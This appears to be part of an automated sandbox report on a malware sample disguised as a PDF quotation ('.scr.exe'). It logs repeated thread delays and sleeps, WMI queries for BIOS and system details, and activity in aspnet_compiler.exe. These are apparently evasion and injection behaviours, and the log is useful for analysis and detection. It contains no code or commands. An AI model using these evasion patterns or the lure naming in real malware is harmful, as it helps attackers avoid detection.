Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598998	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597236	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596552	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596230	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595446	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594359	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Window / User API: threadDelayed 7648	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Window / User API: threadDelayed 2194	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 1660	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 8186	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 6980	Thread sleep count: 7648 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 6980	Thread sleep count: 2194 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -99890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -99781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -99672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -99562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -99453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -99344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -99233s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -98887s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -98771s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -98654s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -98541s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -98435s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -98312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -98203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -98094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -97984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -97875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -97765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -97656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -97547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -97437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -97328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -97219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -97094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -96984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -96875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -96763s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -96641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -96531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -96422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -96312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -96203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -96048s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -95926s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -95795s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -95672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -95562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -95453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -95344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -95219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -95109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -95000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -94890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -94781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -94669s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -94547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -94437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe TID: 4268	Thread sleep time: -94328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7064	Thread sleep count: 1660 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7064	Thread sleep count: 8186 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -599655s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -598998s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -597469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -597236s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -596890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -596781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -596672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -596552s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -596422s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -596230s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -596109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -595999s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -595890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -595446s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -595343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -595015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -594906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -594797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -594687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -594469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4676	Thread sleep time: -594359s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 99672	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 99562	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 99453	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 99344	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 99233	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 98887	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 98771	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 98654	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 98541	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 98435	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 98312	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 98203	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 98094	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 97984	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 97875	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 97765	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 97656	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 97547	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 97437	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 97328	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 97219	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 97094	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 96984	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 96875	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 96763	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 96641	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 96531	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 96422	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 96312	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 96203	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 96048	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 95926	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 95795	Jump to behavior
